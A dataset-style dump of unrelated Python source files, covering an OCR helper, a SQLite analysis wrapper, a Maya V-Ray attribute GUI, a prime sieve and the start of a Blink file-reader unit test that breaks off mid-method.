15,740 | 124f566ddf3cee7f8c11ad930b2016f2576a9115 | import pytesseract as tess
from PIL import Image
import urllib.request
from PIL import Image
async def imageToText(url):
    """Download the image at *url* and OCR it with Tesseract.

    Returns the recognised text minus its final character.
    """
    # get the image from the url, setting to a known browser agent
    # because of mod_security or some similar server security feature
    # which blocks known spider/bot user agents
    # NOTE(review): FancyURLopener is deprecated; urllib.request.Request with
    # a User-Agent header is the modern equivalent — confirm before changing,
    # some hosts may key on this exact UA string.
    class AppURLopener(urllib.request.FancyURLopener):
        version = "Mozilla/5.0"
    opener = AppURLopener()
    response = opener.open(url)
    img = Image.open(response)
    #access tesseract module
    # hard-coded Windows install path for the tesseract binary
    tess.pytesseract.tesseract_cmd ='C:\Program Files\Tesseract-OCR/tesseract.exe'
    result = tess.image_to_string(img)
    # drop the auto-appended trailing character (the original comment said
    # "beginning", but result[:-1] trims the end of the string)
    print("analuyzying")
    print(result)
    return result[:-1]
15,741 | 1494ba956dfb6f37c7491a0d59ff14185dc12827 | """
! what?
the `multiprocessing` module includes an API for
dividing work between multiple processes based on the API for `threading`
+------------------+-----------------------------------------------------------+-----------------+
| concepts | explanation | originated from |
+==================+===========================================================+=================+
| threading | implements concurrency thru application threads | CPU threads |
+------------------+-----------------------------------------------------------+-----------------+
| mutliprocessing | implements concurrency using system processes | System processes|
+------------------+-----------------------------------------------------------+-----------------+
| asyncio | use a single-threaded, single-process approach | see below |
| | in which parts of an application cooperate to switch | |
| | tasks explicitly at optimal times. | |
+------------------+-----------------------------------------------------------+-----------------+
| concurrent. | implements thread and process-based executors | |
| futures | for managing resources pools for running concurrent tasks | |
+------------------+-----------------------------------------------------------+-----------------+
! why?
in some cases, `multiprocessing` is a drop-in replacement,
and can be used instead of `threading` to take advantage of multiple CPU cores
and thereby avoid computational bottlenecks associated with Python's GIL (global interpreter lock)
NOTE:
插入式替换(drop-in replacement) is a term used in computer science and other fields.
it refers to the ability to replace one hardware (or software) components with another one
w/o any other code or configuration changes being required and resulting in no negative impacts.
usually, the replacement has some benefits including one or more of the following.
- increased security
- increased speed
- increased feature set
- increased compatibility (e.g. with other components or standards support)
- increased support (e.g. the old component may no longer be supported, maintained, or manufactured)
! how?
multiprocess
|-- multiprocess Basics
|-- importable Target functions
|-- determine the current process
|-- daemon processes
|-- wait for processes
|-- terminate processes
|-- process Exit Status
|-- logging
|-- subclass process
|-- pass between processes
|-- signal between processes
|-- control access to resources
|-- synchronize operations
|-- control concurrent access to resources
|-- manage shared state
|-- shared namespace
|-- process pools
|-- implement MapReduce
""" |
15,742 | 12531f0ddfbe44de46d84fe6ebbaf7d28b2eccc9 | # Copyright 2018 Jose Cambronero and Phillip Stanley-Marbell
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject
# to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR
# ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import numpy as np
import pandas as pd
import sqlite3 as db
import dbtypes
from specimen import utils
def read_sql(sql, conn):
    """Run *sql* via pandas and normalise all column names to lower case."""
    frame = pd.read_sql(sql, conn)
    frame.columns = [name.lower() for name in frame.columns]
    return frame
class SpecimenQueries:
"""
Contains helpful specimen database queries. Should be used as a starting point for analysis of specimen
data.
"""
    def __init__(self, database_path=None):
        """
        Provides wrapper for queries. Caches queries where possible.
        :param database_path: Path to SQLITE database file
        """
        self.database_path = database_path
        self.conn = db.connect(database=self.database_path)
        # start use of foreign keys
        _cursor = self.conn.cursor()
        _cursor.execute('PRAGMA foreign_keys = ON')
        _cursor.close()
        # query-result cache keyed by (query-name, params...) tuples
        self.cache = {}
    def _clear_cache(self):
        """Clear the in-memory cache of prior query results."""
        self.cache = {}
def _drop_tables(self, tables):
"""
Drop a set of tables from db (often used to materialize intermediate tables for ease of querying and
then removing these to avoid affecting db state)
:param tables: list of tables to drop
:return: drops if they exist, ignores otherwise
"""
cursor = self.conn.cursor()
try:
cursor.execute('DROP TABLE ' + ','.join(map(str, tables)))
except:
pass
finally:
cursor.close()
    def _get_unknown_userid(self):
        """
        Retrieve user id associated with unknown user
        (the sentinel row used for events with no known user).
        """
        cursor = self.conn.cursor()
        unknown_user_str = dbtypes.User.null
        cursor.execute("select id from users where uniqueid='%s'" % unknown_user_str)
        return cursor.fetchone()[0]
def users_and_countries(self, use_cache=True):
"""
Returns a table with userid and most likely country (based on carrier location frequency).
:param use_cache: if true uses cached result, else clears database state and reruns query
:return: pandas dataframe
"""
key = 'user_and_countries'
if use_cache and key in self.cache:
return self.cache[key].copy()
cursor = self.conn.cursor()
if not use_cache:
self._drop_tables(['user_country_freqs', 'user_and_likely_country'])
# userid for unknown user
unknown_user_id = self._get_unknown_userid()
# can only return country info if userid is known
cursor.execute(
"""
CREATE TEMP TABLE user_country_freqs AS
select userid, country, count(*) as ct
from sessions where userid <> %d and country is not null
group by userid, country
""" % unknown_user_id
)
# assigns each user to country with most counts
cursor.execute(
"""
CREATE TEMP TABLE user_and_likely_country AS
SELECT *
FROM
user_country_freqs JOIN (SELECT userid, max(ct) as max_ct FROM user_country_freqs GROUP BY userid) max_cts
USING (userid)
WHERE user_country_freqs.ct = max_cts.max_ct
GROUP BY userid
"""
)
cursor.close()
result = read_sql('SELECT * FROM user_and_likely_country', self.conn)
self.cache[key] = result.copy()
return result
def create_reference_ids_table(self, vals, table_name='_ref'):
"""
Create a temporary reference table by inserting values.
This is used to speed up sqlite queries that are too slow when given
the list directly in the query text (most likely a parsing issue?).
"""
# remove existing
self._drop_tables([table_name])
cursor = self.conn.cursor()
cursor.execute('CREATE TEMP TABLE %s (id INTEGER)' % table_name)
for i, v in enumerate(vals):
cursor.execute('INSERT INTO %s VALUES(%d)' % (table_name, v))
def get_time_offset(self, event_ids, get_extra_info=True, use_cache=True):
"""
Compute the time offset from the start of a session for a list of events.
Only possible with data from JSON files. CSV files have dummy timestamps.
:param event_ids: list of event ids to query
"""
print "Warning: This is only valid for data from the json files! Timestamps in csv are dummies"
if event_ids is None:
raise ValueError('Must provide event ids ts')
key = ('timestamps', tuple(event_ids), get_extra_info)
if use_cache and key in self.cache:
return self.cache[key].copy()
# create event id references to query
self.create_reference_ids_table(event_ids, table_name='_ref')
ts_query = """
SELECT events.id as id, offsettimestamp, event FROM events, _ref
WHERE events.id = _ref.id AND offsettimestamp >= 0
"""
ts = read_sql(ts_query, self.conn)
# adds additional information such as user id, and session id for matching up timestamps
if get_extra_info:
extra_info_query = """
SELECT
sessions.userid,
events.id AS id,
sessions.id AS sessionid
FROM events, sessions, _ref
WHERE events.id = _ref.id AND
events.sessionid = sessions.id
"""
extra_info_df = read_sql(extra_info_query, self.conn)
ts = ts.merge(extra_info_df, how='left', on='id')
self.cache[key] = ts.copy()
return ts
def get_devices(self, event_ids, use_cache=True):
"""
Query the devices associated with particular event ids.
:param event_ids: list of event ids to query
"""
if event_ids is None:
raise ValueError('Must provide event ids')
# cast to tuple so that can be hashed
key = ('devices', tuple(event_ids))
if use_cache and key in self.cache:
return self.cache[key].copy()
# create event id references to query
self.create_reference_ids_table(event_ids, table_name='_ref')
devices_query = """
select
devices.name as device_name,
events.id as eventid
FROM
sessions, events, devices, _ref
WHERE
events.id = _ref.id AND
sessions.id = events.sessionid AND
sessions.deviceid = devices.id
"""
devices_df = read_sql(devices_query, self.conn)
self.cache[key] = devices_df.copy()
return devices_df
def base_selections(self, min_turns=50, which='all', add_fields=None, use_cache=True):
"""
Obtain base selections data, consisting of selections for known userids (i.e. this
precludes data from the CSV files from Flurry, which do not have known user ids associated
with each record). Selects only the first turn in a 'play',
to control for game play. Selects data for users with at least `min_turns` such turns. Caches results
:param min_turns: minimum number of first turns necessary for data, if 0, returns all
:param which: one of 'all', 'correct', 'incorrect', determines what kind of selections are returned
:param add_fields: add extra base fields from table selectionevents. If dict, uses keys as fields
and values as names, if list uses elements as fields and names
:param use_cache: if true, uses cached results, else clears database state and reruns.
:return: pandas dataframe
"""
if min_turns < 0:
raise ValueError('min_turns must be > 0')
if add_fields and not utils.is_iterable(add_fields):
raise ValueError('add_fields must be iterable')
if not which in ['all', 'correct', 'incorrect']:
raise ValueError("which must be one of 'all', 'correct', 'incorrect'")
key = ('first_sels', min_turns, which, add_fields)
if use_cache:
if key in self.cache:
return self.cache[key].copy()
else:
# we may have created tables for different optional args (i.e. diff min_turns)
self._drop_tables(['first_sels', 'enough_plays'])
if not use_cache:
self._drop_tables(['first_sels', 'enough_plays'])
# cobble together additional fields from selectionevents
added = ""
if add_fields:
if not isinstance(add_fields, dict):
add_fields = dict(zip(add_fields, add_fields))
added = ", " + (".".join(["%s as %s" % (f,n) for f, n in add_fields.iteritems()]))
cursor = self.conn.cursor()
# unknown user id
unknown_user_id = self._get_unknown_userid()
# filter to base data consisting of first-turns in play for known user ids
print "Filtering down to first-turns in a play"
cursor.execute("""
-- compute the smallest eventid associated with each playid
CREATE TEMP TABLE sel_cts AS
SELECT MIN(eventid) as min_event_id
FROM selectionevents
where userid <> %d
GROUP BY playid
""" % unknown_user_id)
print "Retrieving selection information for those turns"
cursor.execute("""
-- use this min eventid to select the first choice in each round
CREATE TEMP TABLE first_sels AS
SELECT
userid, playid, id as selid, eventid,
target_r, target_g, target_b,
specimen_r, specimen_g, specimen_b,
target_lab_l, target_lab_a, target_lab_b,
specimen_lab_l, specimen_lab_a, specimen_lab_b,
is_first_pick,
target_h,
target_s,
target_v,
specimen_h,
correct
%s
FROM
selectionevents
INNER JOIN sel_cts
ON selectionevents.eventid = sel_cts.min_event_id
WHERE userid <> %d
""" % (added, unknown_user_id)
)
# restrict to subset of users with at least min_turns
if min_turns:
cursor.execute(
"""
CREATE TEMP TABLE enough_plays as
SELECT userid FROM first_sels GROUP BY userid HAVING count(*) >= %s
""" % min_turns
)
cursor.execute('DELETE FROM first_sels WHERE NOT userid IN (SELECT userid FROM enough_plays)')
cursor.close()
# filter to type of selections requested
if which == 'all':
results = read_sql('SELECT * FROM first_sels', self.conn)
elif which == 'correct':
results = read_sql('SELECT * FROM first_sels WHERE correct', self.conn)
else:
results = read_sql('SELECT * FROM first_sels WHERE NOT correct', self.conn)
self.cache[key] = results.copy()
return results
    def execute_adhoc(self, query, use_cache=True):
        """
        Execute ad-hoc queries over the Specimen database.
        :param query: String SQL query
        :param use_cache: serve a cached copy of this exact query text when available
        :return: pandas dataframe of results
        """
        key = query
        if use_cache and key in self.cache:
            return self.cache[key].copy()
        results = read_sql(query, self.conn)
        self.cache[key] = results.copy()
        return results
|
15,743 | d08cf62b670389e2e80c97b3a0f01a1e249f10e7 | #Exercício Python 112: Dentro do pacote utilidadesCeV que criamos no desafio 111,
# temos um módulo chamado dado. Crie uma função chamada leiaDinheiro() que seja capaz de
# funcionar como a função imputa(), mas com uma validação de dados para aceitar apenas valores que
# seja monetários.
from utilidades import dado
from utilidades import moeda
n = dado.leiaDinheiro('Digite um valor: ')
moeda.resumo(n, 20, 12)
|
15,744 | 9d03d287539eccbe32d684b4173e3d43d898dfb7 | import Player
import Ball
# Global game state used by the main loop.
running = True
screen = None  # set once the display surface is created
player = Player.Player()
ball = Ball.Ball()
15,745 | 16b25da55ed7be193f95c0169f595aa73f7a6180 | import os,sys,sip
from PyQt4 import QtGui, QtCore, uic
import maya.cmds as cmds
import maya.mel as mel
import dsCommon.dsProjectUtil as projectUtil
reload(projectUtil)
#Decalring Paths
dev = "dsDev"
live = "dsGlobal"
status = live
guiName = "vrayShapeAttrGUI.ui"
clashNameSpace = "CLASSINGELEMENT_"
if sys.platform == "linux2":
uiFile = '/' + status + '/dsCore/maya/vrayTools/%s' % guiName
else:
if status == live:
server = projectUtil.listGlobalPath()
sys.path.append(server + '/dsCore/maya/dsCommon/')
uiFile = server + '/dsCore/maya/vrayTools/%s' % guiName
else:
server = projectUtil.listDevPath()
sys.path.append(server + '/dsCore/maya/dsCommon/')
uiFile = server + '/dsCore/maya/vrayTools/%s' % guiName
print 'Loading ui file:', os.path.normpath(uiFile)
form_class, base_class = uic.loadUiType(uiFile)
#Importing maya UI
try:
import maya.OpenMayaUI as mui
except:
pass
def getMayaWindow():
    'Get the maya main window as a QMainWindow instance'
    ptr = mui.MQtUtil.mainWindow()
    # sip expects a long; convert the raw C++ pointer before wrapping it
    ptr = long(ptr)
    return sip.wrapinstance(long(ptr), QtCore.QObject)
class dsVrayShapeAttr(form_class, base_class):
def __init__(self, parent=getMayaWindow()):
super(base_class, self).__init__(parent)
self.setupUi(self)
self.add.clicked.connect(self.addAttr)
self.remove.clicked.connect(self.removeAttr)
#Connecting buttons
self.subdivision.clicked.connect(self.subdivisionAttr)
self.disQuality.clicked.connect(self.disQualityAttr)
self.disControl.clicked.connect(self.disControlAttr)
self.roundEdges.clicked.connect(self.roundEdgesAttr)
self.userAttr.clicked.connect(self.userAttrAttr)
self.fogFade.clicked.connect(self.fogFadeAttr)
self.objectID.clicked.connect(self.objectIDAttr)
self.subDiv_render.clicked.connect(self.subDiv_Attr)
self.subDiv_uv.clicked.connect(self.subDiv_uvAttr)
self.disQuality_override.clicked.connect(self.disQualitySubAttr)
self.round_round.clicked.connect(self.roundEdgesSubAttr)
self.dis_none.clicked.connect(self.disControlTypeAttr)
self.dis_waterLevel.clicked.connect(self.disControlWaterAttr)
self.dis_type.activated.connect(self.disControlTypeDropdown)
self.dis_filter.clicked.connect(self.disControlFilterAttr)
self.dis_boundsDropdown.activated.connect(self.disControlBoundsAttr)
#Initialise Settings Attr
self.subdivisionAttr()
self.disQualityAttr()
self.disControlAttr()
self.fogFadeAttr()
self.roundEdgesAttr()
self.objectIDAttr()
self.userAttrAttr()
def addAttr(self):
onOff = 1
self.vrayAttr(onOff)
def removeAttr(self):
onOff = 0
self.vrayAttr(onOff)
#CONTROL ATTRIBUTES ENABLE/DISABLE
def subdivisionAttr(self):
if self.subdivision.checkState() == 2: state=True
else: state=False
self.subDiv_render.setEnabled(state)
self.subDiv_Attr()
def subDiv_Attr(self):
if self.subdivision.checkState() == 2:
if self.subDiv_render.checkState() == 2: state=True
else: state=False
else: state=False
self.subDiv_uv.setEnabled(state)
self.subDiv_static.setEnabled(state)
self.subDiv_uvAttr()
def subDiv_uvAttr(self):
if self.subdivision.checkState() == 2:
if self.subDiv_render.checkState() == 2:
if self.subDiv_uv.checkState() == 2: state=True
else: state=False
else: state=False
else: state=False
self.subDiv_borders.setEnabled(state)
def disQualityAttr(self):
if self.disQuality.checkState() == 2: state=True
else: state=False
self.disQuality_override.setEnabled(state)
self.disQualitySubAttr()
def disQualitySubAttr(self):
if self.disQuality.checkState() == 2:
if self.disQuality_override.checkState() == 2: state=True
else: state=False
else: state=False
self.disQuality_edge.setEnabled(state)
self.disQuality_edgeLabel.setEnabled(state)
self.disQuality_edgeSlider.setEnabled(state)
self.disQuality_max.setEnabled(state)
self.disQuality_maxLabel.setEnabled(state)
self.disQuality_maxSlider.setEnabled(state)
self.disQuality_view.setEnabled(state)
def disControlAttr(self):
if self.disControl.checkState() == 2: state=True
else: state=False
self.dis_none.setEnabled(state)
self.disControlTypeAttr()
def disControlTypeAttr(self):
if self.disControl.checkState() == 2:
if self.dis_none.checkState() == 0: state=True
else: state=False
else: state=False
self.dis_type.setEnabled(state)
self.dis_typeLabel.setEnabled(state)
self.dis_amount.setEnabled(state)
self.dis_amountLabel.setEnabled(state)
self.dis_amountSlider.setEnabled(state)
self.dis_shift.setEnabled(state)
self.dis_shiftLabel.setEnabled(state)
self.dis_shiftSlider.setEnabled(state)
self.dis_continuity.setEnabled(state)
self.dis_waterLevel.setEnabled(state)
self.dis_filter.setEnabled(state)
self.disControlWaterAttr()
self.disControlTypeDropdown()
self.disControlFilterAttr()
def disControlWaterAttr(self):
    """Enable the water-level amount widgets only while displacement is active ('none' unchecked) and the water-level box is checked."""
    state = (self.disControl.checkState() == 2
             and self.dis_none.checkState() == 0
             and self.dis_waterLevel.checkState() == 2)
    self.dis_waterAmount.setEnabled(state)
    self.dis_waterAmountLabel.setEnabled(state)
    self.dis_waterAmountSlider.setEnabled(state)
def disControlTypeDropdown(self):
    """Split the displacement widgets between 2D mode (dropdown index 0) and 3D mode (any other index), then cascade to the bounds group."""
    active = (self.disControl.checkState() == 2
              and self.dis_none.checkState() == 0)
    # Index 0 of the type dropdown selects 2D displacement.
    is_2d = active and self.dis_type.currentIndex() == 0
    for widget in (self.dis_precision, self.dis_precisionLabel, self.dis_precisionSlider,
                   self.dis_texture, self.dis_textureLabel, self.dis_textureSlider,
                   self.dis_bounds):
        widget.setEnabled(is_2d)
    # The bounds dropdown is the complement: only for 3D displacement.
    is_3d = active and not is_2d
    self.dis_boundsDropdown.setEnabled(is_3d)
    self.dis_boundsDropdownLabel.setEnabled(is_3d)
    self.disControlBoundsAttr()
def disControlFilterAttr(self):
    """Enable the filter-blur widgets only while displacement is active and the filter box is checked."""
    state = (self.disControl.checkState() == 2
             and self.dis_none.checkState() == 0
             and self.dis_filter.checkState() == 2)
    self.dis_filterblur.setEnabled(state)
    self.dis_filterblurLabel.setEnabled(state)
    self.dis_filterblurSlider.setEnabled(state)
def disControlBoundsAttr(self):
    """Enable the explicit min/max bounds widgets only for 3D displacement (type index != 0) with the bounds dropdown on 'explicit' (index 1).

    Note: unlike the sibling handlers this one does not consult dis_none;
    that asymmetry is preserved from the original behavior.
    """
    state = (self.disControl.checkState() == 2
             and self.dis_type.currentIndex() != 0
             and self.dis_boundsDropdown.currentIndex() == 1)
    for widget in (self.dis_boundsMax, self.dis_boundsMaxLabel, self.dis_boundsMaxSlider,
                   self.dis_boundsMin, self.dis_boundsMinLabel, self.dis_boundsMinSlider):
        widget.setEnabled(state)
def roundEdgesAttr(self):
    """Toggle the round-edges checkbox with its group box, then cascade."""
    state = self.roundEdges.checkState() == 2
    self.round_round.setEnabled(state)
    self.roundEdgesSubAttr()
def roundEdgesSubAttr(self):
    """Enable the radius widgets only while both round-edges boxes are checked."""
    state = (self.roundEdges.checkState() == 2
             and self.round_round.checkState() == 2)
    self.round_radius.setEnabled(state)
    self.round_radiusSlider.setEnabled(state)
    self.round_radiusLabel.setEnabled(state)
def userAttrAttr(self):
    """Toggle the user-attribute text field and its label with the group box."""
    state = self.userAttr.checkState() == 2
    self.user_attr.setEnabled(state)
    self.user_attrLabel.setEnabled(state)
def fogFadeAttr(self):
    """Toggle the fog-fade radius widgets with the group box."""
    state = self.fogFade.checkState() == 2
    self.fog_radius.setEnabled(state)
    self.fog_radiusLabel.setEnabled(state)
    self.fog_radiusSlider.setEnabled(state)
def objectIDAttr(self):
    """Toggle the object-ID widgets with the group box."""
    state = self.objectID.checkState() == 2
    self.obj_id.setEnabled(state)
    self.obj_idLabel.setEnabled(state)
    self.obj_idSlider.setEnabled(state)
#ACTUAL FUNCTION
def vrayAttr(self, onOff):
    """Apply (onOff=1) or remove (onOff=0) the checked V-Ray attribute
    groups on every mesh/NURBS/subdiv shape under the current selection,
    copying the values out of the UI widgets.  Python 2 / Maya only.
    """
    sel = cmds.ls(sl=True)
    # NOTE(review): listRelatives returns None when nothing matches, which
    # would make the loop below raise — confirm the selection is validated
    # upstream before this is called.
    shapes = cmds.listRelatives(sel, ad=True, fullPath=True, type=["mesh", "nurbsSurface", "subdiv"])
    for shape in shapes:
        # --- subdivision group ---
        if self.subdivision.checkState() == 2:
            mel.eval("vray addAttributesFromGroup %s vray_subdivision %s" % (shape, onOff))
            if onOff == 1:
                if self.subDiv_render.checkState() == 2:
                    cmds.setAttr("%s.vraySubdivEnable" % shape, 1)
                    if self.subDiv_uv.checkState() == 2:
                        cmds.setAttr("%s.vraySubdivUVs" % shape, 1)
                        if self.subDiv_borders.checkState() == 2: cmds.setAttr("%s.vraySubdivUVsAtBorders" % shape, 1)
                        else: cmds.setAttr("%s.vraySubdivUVsAtBorders" % shape, 0)
                    else: cmds.setAttr("%s.vraySubdivUVs" % shape, 0)
                    if self.subDiv_static.checkState() == 2: cmds.setAttr("%s.vrayStaticSubdiv" % shape, 1)
                    else: cmds.setAttr("%s.vrayStaticSubdiv" % shape, 0)
                else:
                    cmds.setAttr("%s.vraySubdivEnable" % shape, 0)
        # --- subdivision/displacement quality group ---
        if self.disQuality.checkState() == 2:
            mel.eval("vray addAttributesFromGroup %s vray_subquality %s" % (shape, onOff))
            if onOff == 1:
                if self.disQuality_override.checkState() == 2:
                    cmds.setAttr("%s.vrayOverrideGlobalSubQual" % shape, 1)
                    if self.disQuality_view.checkState() == 2: cmds.setAttr("%s.vrayViewDep" % shape, 1)
                    else: cmds.setAttr("%s.vrayViewDep" % shape, 0)
                    cmds.setAttr("%s.vrayEdgeLength" % shape, float(self.disQuality_edge.text()))
                    cmds.setAttr("%s.vrayMaxSubdivs" % shape, int(self.disQuality_max.text()))
                else: cmds.setAttr("%s.vrayOverrideGlobalSubQual" % shape, 0)
        # --- displacement control group ---
        if self.disControl.checkState() == 2:
            mel.eval("vray addAttributesFromGroup %s vray_displacement %s" % (shape, onOff))
            if onOff == 1:
                if self.dis_none.checkState() != 2:
                    cmds.setAttr("%s.vrayDisplacementNone" % shape, 0)
                    cmds.setAttr("%s.vrayDisplacementType" % shape, int(self.dis_type.currentIndex()))
                    cmds.setAttr("%s.vrayDisplacementAmount" % shape, float(self.dis_amount.text()))
                    cmds.setAttr("%s.vrayDisplacementShift" % shape, float(self.dis_shift.text()))
                    # NOTE(review): the '!= 2' tests below treat an UNCHECKED
                    # box as "on", which is the opposite of the enable-logic in
                    # disControlWaterAttr — confirm the intended semantics.
                    if self.dis_continuity.checkState() != 2: cmds.setAttr("%s.vrayDisplacementKeepContinuity" % shape, 1)
                    else: cmds.setAttr("%s.vrayDisplacementKeepContinuity" % shape, 0)
                    if self.dis_waterLevel.checkState() != 2:
                        cmds.setAttr("%s.vrayEnableWaterLevel" % shape, 1)
                        cmds.setAttr("%s.vrayWaterLevel" % shape, float(self.dis_waterAmount.text()))
                    else: cmds.setAttr("%s.vrayEnableWaterLevel" % shape, 0)
                    print self.dis_type.currentIndex()
                    # Dropdown index 0 is 2D displacement; anything else is 3D.
                    if self.dis_type.currentIndex() == 0:
                        cmds.setAttr("%s.vray2dDisplacementResolution" % shape, int(self.dis_texture.text()))
                        cmds.setAttr("%s.vray2dDisplacementPrecision" % shape, int(self.dis_precision.text()))
                        if self.dis_bounds.checkState() == 2: cmds.setAttr("%s.vray2dDisplacementTightBounds" % shape, 1)
                        else: cmds.setAttr("%s.vray2dDisplacementTightBounds" % shape, 0)
                        if self.dis_filter.checkState() == 2:
                            cmds.setAttr("%s.vray2dDisplacementFilterTexture" % shape, 1)
                            cmds.setAttr("%s.vray2dDisplacementFilterBlur" % shape, float(self.dis_filterblur.text()))
                        else: cmds.setAttr("%s.vray2dDisplacementFilterTexture" % shape, 0)
                    if self.dis_type.currentIndex() != 0:
                        if self.dis_boundsDropdown.currentIndex() == 1:
                            cmds.setAttr("%s.vrayDisplacementUseBounds" % shape, 1)
                            ## cmds.setAttr("%s.vray2dDisplacementFilterBlur" % shape, float(self.dis_filterblur.text()))
                            ## setAttr "pPlaneShape1.vrayDisplacementMinValue" -type double3 0.404501 0.404501 0.404501 ;
                            ## setAttr "pPlaneShape1.vrayDisplacementMaxValue" -type double3 0.584268 0.584268 0.584268 ;
                        else: cmds.setAttr("%s.vrayDisplacementUseBounds" % shape, 0)
                else: cmds.setAttr("%s.vrayDisplacementNone" % shape, 1)
        # --- round edges group ---
        if self.roundEdges.checkState() == 2:
            mel.eval("vray addAttributesFromGroup %s vray_roundedges %s" % (shape, onOff))
            if onOff == 1:
                if self.round_round.checkState() == 2:
                    cmds.setAttr("%s.vrayRoundEdges" % shape, 1)
                    val = self.round_radius.text()
                    cmds.setAttr("%s.vrayRoundEdgesRadius" % shape, float(val))
                else: cmds.setAttr("%s.vrayRoundEdges" % shape, 0)
        # --- user attributes group ---
        if self.userAttr.checkState() == 2:
            mel.eval("vray addAttributesFromGroup %s vray_user_attributes %s" % (shape, onOff))
            if onOff == 1:
                text = self.user_attr.text()
                cmds.setAttr("%s.vrayUserAttributes" % shape, text, type="string")
        # --- fog fade-out group ---
        if self.fogFade.checkState() == 2:
            mel.eval("vray addAttributesFromGroup %s vray_fogFadeOut %s" % (shape, onOff))
            if onOff == 1:
                val = self.fog_radius.text()
                cmds.setAttr("%s.vrayFogFadeOut" % shape, float(val))
        # --- object ID group ---
        if self.objectID.checkState() == 2:
            mel.eval("vray addAttributesFromGroup %s vray_objectID %s" % (shape, onOff))
            if onOff == 1:
                cmds.setAttr("%s.vrayObjectID" % shape, int(self.obj_id.text()))
def vrayShapeAttrUI():
    """Construct and show the V-Ray shape-attribute dialog.

    The instance is kept in the module-level ``myWindow`` so it is not
    garbage-collected while the window is open.
    """
    global myWindow
    myWindow = dsVrayShapeAttr()
    myWindow.show()
15,746 | 9cb60d1e90485816ccf2f2b8e83c9c0610f93770 | # -*- coding: utf-8 -*-
# Linear (Euler) sieve for all primes up to a bound: every composite is
# struck out exactly once, by its smallest prime factor, so it is O(N).
# There are 664579 primes below 10,000,000; takes ~6 s in CPython.


def euler_sieve(maxn):
    """Return the list of all primes <= maxn using the linear sieve.

    Generalizes the original hard-coded script, and fixes an off-by-one:
    the original scanned range(2, maxn), silently dropping maxn itself,
    so a prime upper bound was never counted.

    >>> euler_sieve(10)
    [2, 3, 5, 7]
    """
    checked = [False] * (maxn + 1)  # checked[i]: i is known composite
    primes = []
    for i in range(2, maxn + 1):
        if not checked[i]:
            primes.append(i)
        for p in primes:
            if p * i > maxn:
                break
            checked[p * i] = True
            if i % p == 0:
                # p is the smallest prime factor of i; stopping here ensures
                # each composite is marked only by its smallest prime factor.
                break
    return primes


if __name__ == "__main__":
    print(len(euler_sieve(10000000)))
|
15,747 | 27bc20dce2c25da5eab5642ab5ee270105c41320 | # Copyright (C) 2010 Chris Jerdonek (cjerdonek@webkit.org)
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from blinkpy.common.system.filesystem import FileSystem
from blinkpy.common.system.log_testing import LoggingTestCase
from blinkpy.style.checker import ProcessorBase
from blinkpy.style.filereader import TextFileReader
class TextFileReaderTest(LoggingTestCase):
    """Unit tests for TextFileReader, exercised against a real temporary
    filesystem and a recording mock processor."""

    class MockProcessor(ProcessorBase):
        """A processor for test purposes.

        This processor simply records the parameters passed to its process()
        method for later checking by the unittest test methods.
        """

        def __init__(self):
            self.processed = []
            """The parameters passed for all calls to the process() method."""

        def should_process(self, file_path):
            # Lets the tests exercise TextFileReader's skip path.
            return not file_path.endswith('should_not_process.txt')

        def process(self, lines, file_path, test_kwarg=None):
            self.processed.append((lines, file_path, test_kwarg))

    def setUp(self):
        LoggingTestCase.setUp(self)
        # FIXME: This should be a MockFileSystem once TextFileReader is moved entirely on top of FileSystem.
        self.filesystem = FileSystem()
        self._temp_dir = str(self.filesystem.mkdtemp())
        self._processor = TextFileReaderTest.MockProcessor()
        self._file_reader = TextFileReader(self.filesystem, self._processor)

    def tearDown(self):
        LoggingTestCase.tearDown(self)
        self.filesystem.rmtree(self._temp_dir)

    def _create_file(self, rel_path, text):
        """Create a file with given text and return the path to the file."""
        # FIXME: There are better/more secure APIs for creating tmp file paths.
        file_path = self.filesystem.join(self._temp_dir, rel_path)
        self.filesystem.write_text_file(file_path, text)
        return file_path

    def _passed_to_processor(self):
        """Return the parameters passed to MockProcessor.process()."""
        return self._processor.processed

    def _assert_file_reader(self, passed_to_processor, file_count):
        """Assert the state of the file reader."""
        self.assertEqual(passed_to_processor, self._passed_to_processor())
        self.assertEqual(file_count, self._file_reader.file_count)

    def test_process_file__does_not_exist(self):
        """A missing file exits with status 1 and logs an error."""
        try:
